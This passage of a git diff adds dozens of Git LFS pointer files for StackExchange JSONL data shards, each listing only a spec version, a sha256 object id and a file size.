0000000000000000000000000000000000000000..4486542979574807dfb289cff504d5ab0a54ae49 --- /dev/null +++ b/data/stackexchange/1-1/899_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:30830530e25d0c358f1b4d63e767441b1ded12f14b75e6cae75091df06612af9 +size 43123004 diff --git a/data/stackexchange/1-1/89_2289.jsonl b/data/stackexchange/1-1/89_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5c688b295dad5ab00ce07ec7b40effa487576c8f --- /dev/null +++ b/data/stackexchange/1-1/89_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93a9e3cc8eeacdcac389fbd7da2f767453609ceedfb84af59bfb754013053318 +size 39253926 diff --git a/data/stackexchange/1-1/8_2289.jsonl b/data/stackexchange/1-1/8_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6f5b0545b9f5cd2b4175be7578fd4d24e444d36d --- /dev/null +++ b/data/stackexchange/1-1/8_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3a8d4a9457955dfb562a34d03691290a10e44e96be7f869c8e6bf60275ea2205 +size 35702822 diff --git a/data/stackexchange/1-1/900_2289.jsonl b/data/stackexchange/1-1/900_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..33c4538af30094ebc82ed1dc30a432e0b18231b3 --- /dev/null +++ b/data/stackexchange/1-1/900_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:074d32a9ae8a86fbaadf359153e54d3290dfa61192db7a0a951b6221e24bf091 +size 44128795 diff --git a/data/stackexchange/1-1/901_2289.jsonl b/data/stackexchange/1-1/901_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..928d922698dd45eba66db4b6ed043d01a4325709 --- /dev/null +++ b/data/stackexchange/1-1/901_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2f3da2c108b07a291698536a777b0520f8e9d5b60d72de2acdb6b0dfb1f12c63 +size 44860390 diff --git a/data/stackexchange/1-1/902_2289.jsonl b/data/stackexchange/1-1/902_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7ae4ee28cddfdeb49edab2dc42190e7bc8e787d7 --- /dev/null +++ b/data/stackexchange/1-1/902_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:48a37a4db9afcfed477b3df1571df264b712e185cd7e2ccfb9c2b284cdbf2495 +size 44707356 diff --git a/data/stackexchange/1-1/903_2289.jsonl b/data/stackexchange/1-1/903_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b69dd25918dbabce9c5e7ec01da39e35ce539774 --- /dev/null +++ b/data/stackexchange/1-1/903_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:957ba2a3f5916ab88d737a9f1faad2fbbeb6da2892b0acdf1ba26dcab04a0f0e +size 44422011 diff --git a/data/stackexchange/1-1/904_2289.jsonl b/data/stackexchange/1-1/904_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..550ddab64896bb923f55c0ae2945e45945ea2c21 --- /dev/null +++ b/data/stackexchange/1-1/904_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3298d09e8614dfa050b50eda1700c52c154c596df256d7da57f596e2028e24f3 +size 44135550 diff --git a/data/stackexchange/1-1/905_2289.jsonl b/data/stackexchange/1-1/905_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6f14587e8258e42346f330e904865b7f533d9ffb --- /dev/null +++ b/data/stackexchange/1-1/905_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1091f7c4557b8e6f46c4f228f9384b24fe3728e7d40b08cb5a742e90280b38b2 +size 44882832 diff --git a/data/stackexchange/1-1/906_2289.jsonl b/data/stackexchange/1-1/906_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a0a79442ae45c01534efa851b8e5b8c11d6b0774 --- /dev/null +++ b/data/stackexchange/1-1/906_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:891262a022535f55b09e6de6db118922e26cdc98329cced0417ea931458fc820 +size 44790780 diff --git a/data/stackexchange/1-1/907_2289.jsonl b/data/stackexchange/1-1/907_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..efd260cff8ce5fbf49f9fd510fee5b1a7377ffc9 --- /dev/null +++ b/data/stackexchange/1-1/907_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f429e7408c73012d29df45f3e956cee2ef531532baab24d3caaa06a374d20e1b +size 44673190 diff --git a/data/stackexchange/1-1/908_2289.jsonl b/data/stackexchange/1-1/908_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..91f44980b34dc650b85edbcb2e464ea1aa377bdb --- /dev/null +++ b/data/stackexchange/1-1/908_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f0be2c70d33066ede2ffbbf2c7655cb303a2b31f8571a249c9136c6e27776810 +size 44861439 diff --git a/data/stackexchange/1-1/909_2289.jsonl b/data/stackexchange/1-1/909_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d00432c43a99795f59820e9cd67fe9f80645c703 --- /dev/null +++ b/data/stackexchange/1-1/909_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:51f1717400e227ab2b485ca191fd922264ebe8710e3b0791eb1ff640cb0af890 +size 44364141 diff --git a/data/stackexchange/1-1/90_2289.jsonl b/data/stackexchange/1-1/90_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b9994fabcbd113953d61d6a022729d1353841d61 --- /dev/null +++ b/data/stackexchange/1-1/90_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e1bed1a8933c9472d4558f457c17c52cda7aa1b6eaaeb3eeb481a1167956be2f +size 39394673 diff --git a/data/stackexchange/1-1/910_2289.jsonl b/data/stackexchange/1-1/910_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..33fe589fbe024b627536f2431923f0ed84a1c473 --- /dev/null +++ b/data/stackexchange/1-1/910_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8ba1027c0bbf32c518e1a9f4bf118cb92af190e4d3dbf46cbffb8ecaf20b7e82 +size 44337073 diff --git a/data/stackexchange/1-1/911_2289.jsonl b/data/stackexchange/1-1/911_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1945be3d7c01f5fbb445b53de8d75df4b41bc64d --- /dev/null +++ b/data/stackexchange/1-1/911_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8817fcef4f11942343c01f4809a8c36de71a9de19a786090a1ae2080dfd65e7e +size 44141621 diff --git a/data/stackexchange/1-1/912_2289.jsonl b/data/stackexchange/1-1/912_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..697fd95833cbe0015d07d7d843d5d9c9c6387b38 --- /dev/null +++ b/data/stackexchange/1-1/912_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1b3b2ae53a969ab07f8aea7deb597a8278a908f1189e7b4faf1b60149beb10b3 +size 44198314 diff --git a/data/stackexchange/1-1/913_2289.jsonl b/data/stackexchange/1-1/913_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1a0c1aeb7919f2fc03887245c086838ae32f5d42 --- /dev/null +++ b/data/stackexchange/1-1/913_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f8738e378e84b047dbf270ce09ffa70c0ab2e8c7b90038cc21b4d579c38da011 +size 44139885 diff --git a/data/stackexchange/1-1/914_2289.jsonl b/data/stackexchange/1-1/914_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dbb97060021b5a32a96fc8474ddf21a9edf422f2 --- /dev/null +++ b/data/stackexchange/1-1/914_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:41d8ee332de9dc55affee3eb75d53410b0eab8fe1ac4a5378dfd0c7dbcdab3bc +size 45475746 diff --git a/data/stackexchange/1-1/915_2289.jsonl b/data/stackexchange/1-1/915_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1682f8f4fa17c89cee69932317ceff1b9987238c --- /dev/null +++ b/data/stackexchange/1-1/915_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:492e840ed356d89183362e33ff3969d6036406f3bf98559cf88abafa0002ccb7 +size 44651925 diff --git a/data/stackexchange/1-1/916_2289.jsonl b/data/stackexchange/1-1/916_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5fc3b384a0a4b64ebc160abb92b13553805ca47f --- /dev/null +++ b/data/stackexchange/1-1/916_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:decfb60bcfe5a10aa6db16932efdaefa39f1145024613cd274f7153a77320100 +size 44213589 diff --git a/data/stackexchange/1-1/917_2289.jsonl b/data/stackexchange/1-1/917_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..58f504d18a5cdd8c9c0ae5bfd1bada59eb17928f --- /dev/null +++ b/data/stackexchange/1-1/917_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f08f3e66b7caddf48ac8b227a368cfa9a8383ed7872c63acc9178156002a70be +size 44588147 diff --git a/data/stackexchange/1-1/918_2289.jsonl b/data/stackexchange/1-1/918_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7877b6f0b4f5cf5f0f06989caa6ec81392f65b3f --- /dev/null +++ b/data/stackexchange/1-1/918_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c3347bda235ab35d463548b0378f5e31111fb56bb88f7b2eb99c382563c7cc74 +size 44881231 diff --git a/data/stackexchange/1-1/919_2289.jsonl b/data/stackexchange/1-1/919_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9ed114f808eab10485ef16f1b58268754b6dc964 --- /dev/null +++ b/data/stackexchange/1-1/919_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6730b23563158c5b81f010f769b4016b656fb6853c8b109296278a8e8013e20b +size 43723647 diff --git a/data/stackexchange/1-1/91_2289.jsonl b/data/stackexchange/1-1/91_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f13da1857e1efe951d635be470f0ec1b08cf3406 --- /dev/null +++ b/data/stackexchange/1-1/91_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eb3350f6febe987cd4a52d6cbe11d9f0ae5c7bc9e8fcd10e329e1a2042912ef4 +size 39900383 diff --git a/data/stackexchange/1-1/920_2289.jsonl b/data/stackexchange/1-1/920_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cd27f80332817316f95d3e99f08fb06fae420516 --- /dev/null +++ b/data/stackexchange/1-1/920_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:79c8b62c2092e454b8b98b588fee924847bc6eb57708e0badf1b7e17a5cc93de +size 43665058 diff --git a/data/stackexchange/1-1/921_2289.jsonl b/data/stackexchange/1-1/921_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2046e852d3ef05269c788b84ed5b96251d4a7487 --- /dev/null +++ b/data/stackexchange/1-1/921_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5c99f00a537e74d3316ca69b05ebd98f47b915c12583c3ea1d9fc8f796ee7350 +size 44778704 diff --git a/data/stackexchange/1-1/922_2289.jsonl b/data/stackexchange/1-1/922_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eb88370a6c9f20700bf20e38bf128a8b4b4c43b4 --- /dev/null +++ b/data/stackexchange/1-1/922_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3a806049e25b055be6b49d6f7f766995e235dceb7071600cfa686b6af57b85f8 +size 44669307 diff --git a/data/stackexchange/1-1/923_2289.jsonl b/data/stackexchange/1-1/923_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9b511115325b3ca520492bc4abbe1c89e0eef2dd --- /dev/null +++ b/data/stackexchange/1-1/923_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4dcb989158ad44a6d04cc60187351771204cab932ad906fc61ccb4a019234573 +size 43385815 diff --git a/data/stackexchange/1-1/924_2289.jsonl b/data/stackexchange/1-1/924_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a3f3851c822dd76a20dc89f62869ef3be04f4ee9 --- /dev/null +++ b/data/stackexchange/1-1/924_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a64b1231ca8f8eeab98c9fc2660c0296e01aedbe110651b4a0743747e717bde2 +size 44323022 diff --git a/data/stackexchange/1-1/925_2289.jsonl b/data/stackexchange/1-1/925_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9162857a41a26d03f871b49a4ac8c2b3fcf8851c --- /dev/null +++ b/data/stackexchange/1-1/925_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:863772381d621b082cd6363d914976d0b5855a93842ba33fd245948df7920959 +size 44853555 diff --git a/data/stackexchange/1-1/926_2289.jsonl b/data/stackexchange/1-1/926_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ab209817791b3622601247a6f3bd993097fd74b1 --- /dev/null +++ b/data/stackexchange/1-1/926_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c2f8bed5b4fbf28180b2f68009a34b9a6a702625b3e3945e9c717b4c76067b74 +size 44595276 diff --git a/data/stackexchange/1-1/927_2289.jsonl b/data/stackexchange/1-1/927_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..673435b21b730b86545cc90ebe5262443bdf8d63 --- /dev/null +++ b/data/stackexchange/1-1/927_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b9c12b5802ffd023a05f439953a941d115d8beefe2027afa385cfb36c39ce4a5 +size 44593442 diff --git a/data/stackexchange/1-1/928_2289.jsonl b/data/stackexchange/1-1/928_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d3e512a7f0d35db2d25cb490697fd0a159307a83 --- /dev/null +++ b/data/stackexchange/1-1/928_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:baeafd3c9eec49259099920687c6f8ac00f9898cf38b3352681bbf1af071f500 +size 45017484 diff --git a/data/stackexchange/1-1/929_2289.jsonl b/data/stackexchange/1-1/929_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d4b1ff6728bb0e69a89e18d51eacacf1cf7d2d02 --- /dev/null +++ b/data/stackexchange/1-1/929_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3e135f1545c71c2fb767f06be4e399bef7a86a03759338655664868e09ee4013 +size 44099652 diff --git a/data/stackexchange/1-1/92_2289.jsonl b/data/stackexchange/1-1/92_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c59e0dda44344d392aa41955a5b7f1849d4a6f22 --- /dev/null +++ b/data/stackexchange/1-1/92_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e3075c3a4036c2c087d0e2b10caab5a392c84a1e46feb39228a4c8a9179f021d +size 39817542 diff --git a/data/stackexchange/1-1/930_2289.jsonl b/data/stackexchange/1-1/930_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5c3e13475a7d3040ccac9d0886d7d84f2ce30197 --- /dev/null +++ b/data/stackexchange/1-1/930_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:00453f757e4c7289274b262e7607acaf3e8adfe29704eedbbceabc6f30189ade +size 44179170 diff --git a/data/stackexchange/1-1/931_2289.jsonl b/data/stackexchange/1-1/931_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a0f04d446318d3b9a4c0f7e75a65e4f40011f1c4 --- /dev/null +++ b/data/stackexchange/1-1/931_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:950c73dfb25e73f2583c2f0c7211c0bd6c4659f10bd959e10b78c89057323595 +size 44117867 diff --git a/data/stackexchange/1-1/932_2289.jsonl b/data/stackexchange/1-1/932_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2843069f8cd44cdcf6ad26ba79e2239b5e775c0f --- /dev/null +++ b/data/stackexchange/1-1/932_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:77b40bb0115c628edf8f19df3c1f87b1bbd85d484e4ee1471cf5155a754dbcc6 +size 44781353 diff --git a/data/stackexchange/1-1/933_2289.jsonl b/data/stackexchange/1-1/933_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..15e3b3c4b8bf3b69aaed847e5235a41ffb3cff63 --- /dev/null +++ b/data/stackexchange/1-1/933_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8dc17641dd1f89b314bf8ff5a161253f677e52ecb2a2ef8a48b297e2aff263f3 +size 44647798 diff --git a/data/stackexchange/1-1/934_2289.jsonl b/data/stackexchange/1-1/934_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..209267f3797d12fbf3eff8339d8bc7f4eb9d80f1 --- /dev/null +++ b/data/stackexchange/1-1/934_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9dddd4e84c19f3ddd806840bc2351c704a2eb885ea543cef6890ceb86017fc92 +size 44679575 diff --git a/data/stackexchange/1-1/935_2289.jsonl b/data/stackexchange/1-1/935_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..00767a13e13a413a86d5cae6b7e508c907fdccdc --- /dev/null +++ b/data/stackexchange/1-1/935_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a56d04064f891c03b27cb7280c864abef63603e068acfa04faa41f38011aa5fe +size 44181253 diff --git a/data/stackexchange/1-1/936_2289.jsonl b/data/stackexchange/1-1/936_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2c08191ae8b12d07be6a901ba2063855290eec2a --- /dev/null +++ b/data/stackexchange/1-1/936_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9da4d6009c0433ac83565d064de5fee1bf6dd160debb282b7cd43f2fe7563715 +size 44588942 diff --git a/data/stackexchange/1-1/937_2289.jsonl b/data/stackexchange/1-1/937_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..12cef69b62370f22ee975d22b029d49398e4c101 --- /dev/null +++ b/data/stackexchange/1-1/937_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5fd360cbb65ed736faf7f73325e6b36b33c02b0ad8b0e31b1878f3f17806ca89 +size 44527615 diff --git a/data/stackexchange/1-1/938_2289.jsonl b/data/stackexchange/1-1/938_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a387370a3d7f6923216f19dd55f3a68c5a3ea4b4 --- /dev/null +++ b/data/stackexchange/1-1/938_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6aadf2752db6ad25da4c0ad68e40cf9144f9439ce7bcf2bb735e90781d4fbdfc +size 43903641 diff --git a/data/stackexchange/1-1/939_2289.jsonl b/data/stackexchange/1-1/939_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c09b647a7e529294e0c34c8734b65aa46349da0d --- /dev/null +++ b/data/stackexchange/1-1/939_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:da899fcb9ddbff048ee768e79825390e5a00d90cd29299f1d93b6f8999a5013e +size 43864214 diff --git a/data/stackexchange/1-1/93_2289.jsonl b/data/stackexchange/1-1/93_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d5ef06c3cee317083a406555ffd8beaddd33c60e --- /dev/null +++ b/data/stackexchange/1-1/93_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:67a67848a39f4fc6ba8d1f32c2d7864fddc580ba9530cfa05f8414c7841c3bc2 +size 39830712 diff --git a/data/stackexchange/1-1/940_2289.jsonl b/data/stackexchange/1-1/940_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bbb943c59c46cb1913137f36d3ca50d97b14b745 --- /dev/null +++ b/data/stackexchange/1-1/940_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9437c27f0d757d005dd12c911904c08ca48046e9aa510a210b7c06fbd04610c2 +size 43890789 diff --git a/data/stackexchange/1-1/941_2289.jsonl b/data/stackexchange/1-1/941_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e26e63b284691deb23229840af5e23aee3f8e8b8 --- /dev/null +++ b/data/stackexchange/1-1/941_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:040f14a21d83e3eb7b7b3958ad42bd23b11996c67bd455b0cfcd4408d8841de9 +size 44433062 diff --git a/data/stackexchange/1-1/942_2289.jsonl b/data/stackexchange/1-1/942_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c6d067a32860f9b8fd02f6cc9488988c2d276220 --- /dev/null +++ b/data/stackexchange/1-1/942_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:17c6c06d0873c91555fd993f4f6facb4e60d5069c82ec7680d395c7c1f3c6a76 +size 44402400 diff --git a/data/stackexchange/1-1/943_2289.jsonl b/data/stackexchange/1-1/943_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..706a75a85c199ddb39b2c0859a74c87a23c7f80f --- /dev/null +++ b/data/stackexchange/1-1/943_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2795eec091bade2d7a49212c5f01a4c9d77b1593dcbc257b6d6b857368deba3e +size 44157644 diff --git a/data/stackexchange/1-1/944_2289.jsonl b/data/stackexchange/1-1/944_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e584cc7b8e673f2e498d092ffbebbb88fc9cae81 --- /dev/null +++ b/data/stackexchange/1-1/944_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:84c5af0c536c7a6c788fc8c2d9d97b288cd1acd066ff8a7059e84405c3bf5f06 +size 45595469 diff --git a/data/stackexchange/1-1/945_2289.jsonl b/data/stackexchange/1-1/945_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fc1e5ba0eb32d88bca084f2be220ff2bb18b92b5 --- /dev/null +++ b/data/stackexchange/1-1/945_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1f0c57f689f9397c5c6611aca3ee32004d1d278651886c9d68325361fa0178f6 +size 44137091 diff --git a/data/stackexchange/1-1/946_2289.jsonl b/data/stackexchange/1-1/946_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f6ccce637a8dac2a8a3d6f870591a535dfc2ab50 --- /dev/null +++ b/data/stackexchange/1-1/946_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b48415b41d595cad466d5ca28149c4fc43b5afb9761abb2d661e27e7c0ac0f7d +size 44750859 diff --git a/data/stackexchange/1-1/947_2289.jsonl b/data/stackexchange/1-1/947_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cfc6f1c636d9e78f387aa67e536fc21793a3958e --- /dev/null +++ b/data/stackexchange/1-1/947_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:253794381c70c47eb216db8b2b890b5b5adfa0452a5cceef80512e5c0def89e8 +size 44093088 diff --git a/data/stackexchange/1-1/948_2289.jsonl b/data/stackexchange/1-1/948_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aab53989fa98d5b7af35e855bcb3a0253802f3d4 --- /dev/null +++ b/data/stackexchange/1-1/948_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:050247bf55902cff43ad1de298a408bdf9eae2499c940cad3eb6c6902d06fa30 +size 43785675 diff --git a/data/stackexchange/1-1/949_2289.jsonl b/data/stackexchange/1-1/949_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f451641de4e74d21a75199774927902a532b2379 --- /dev/null +++ b/data/stackexchange/1-1/949_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b116ea34e4ad615819ad30315e301dd4a470b225aa70fbc759e7e5da95b7ec50 +size 45009487 diff --git a/data/stackexchange/1-1/94_2289.jsonl b/data/stackexchange/1-1/94_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..89be562d8ba2c767299dd9fff0b5718b65860284 --- /dev/null +++ b/data/stackexchange/1-1/94_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:febc84af4a39f8efb32d6804706661ccdff9da1feb686959d6120ee68f55ef40 +size 39398158 diff --git a/data/stackexchange/1-1/950_2289.jsonl b/data/stackexchange/1-1/950_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..373ec29978eece93d397a62c445ecd1da837f893 --- /dev/null +++ b/data/stackexchange/1-1/950_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:936e9353489c2f425c22da3ee67ef2ef8649263e29ce2661f810823e252908a9 +size 34872808 diff --git a/data/stackexchange/1-1/951_2289.jsonl b/data/stackexchange/1-1/951_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..14c8787878e8889e7a04652f1b4ea198d425a3a9 --- /dev/null +++ b/data/stackexchange/1-1/951_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:76647eeed4989f1538152ff69821bb1897a7dc048f1d71f84f99cca13ad4b77f +size 34679040 diff --git a/data/stackexchange/1-1/952_2289.jsonl b/data/stackexchange/1-1/952_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..911a07a6e0edace2004f4d39e2a9667ba68d3b3f --- /dev/null +++ b/data/stackexchange/1-1/952_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9ef5f9e53d87b13668f620febf0484e668edeecfb1d34341e643389bbb2b36a5 +size 34604425 diff --git a/data/stackexchange/1-1/953_2289.jsonl b/data/stackexchange/1-1/953_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..07ec1daf3b2cb7c5b9b38f4528a2a32f7f84a23f --- /dev/null +++ b/data/stackexchange/1-1/953_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b4a1719cc225a946cb90b1d7ef6c4c34322d8846bb5baa08a3d17aee138497ce +size 34724862 diff --git a/data/stackexchange/1-1/954_2289.jsonl b/data/stackexchange/1-1/954_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0b9fbeec4767e37ef2ba04ced7209b613b79903b --- /dev/null +++ b/data/stackexchange/1-1/954_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5914d7900e7040267cbdd22d57190befed4a4ff05d173b17c650137a35ffe797 +size 35102315 diff --git a/data/stackexchange/1-1/955_2289.jsonl b/data/stackexchange/1-1/955_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1626b58ff3a137dafd9f5a62b4f358dceb60a7ae --- /dev/null +++ b/data/stackexchange/1-1/955_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2f306d9af922c2aebbcfee9f76502fcecdabb2ec0d37a541e064fd92577c0f5a +size 34329084 diff --git a/data/stackexchange/1-1/956_2289.jsonl b/data/stackexchange/1-1/956_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3e5b271b1ff970cbd2a568c0927bbb0b8814b2bf --- /dev/null +++ b/data/stackexchange/1-1/956_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:541fd2a6dcb174d911e7cf3ac91f62b545601d4932097c1201071ebbde9eab7f +size 35093793 diff --git a/data/stackexchange/1-1/957_2289.jsonl b/data/stackexchange/1-1/957_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..42030c351c7a893faef76f10b7d466124796ee49 --- /dev/null +++ b/data/stackexchange/1-1/957_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b648e5f2efb9d55d9a25b2fd5b3026ebb7f81a66183a212252fa010b5950fffa +size 34438058 diff --git a/data/stackexchange/1-1/958_2289.jsonl 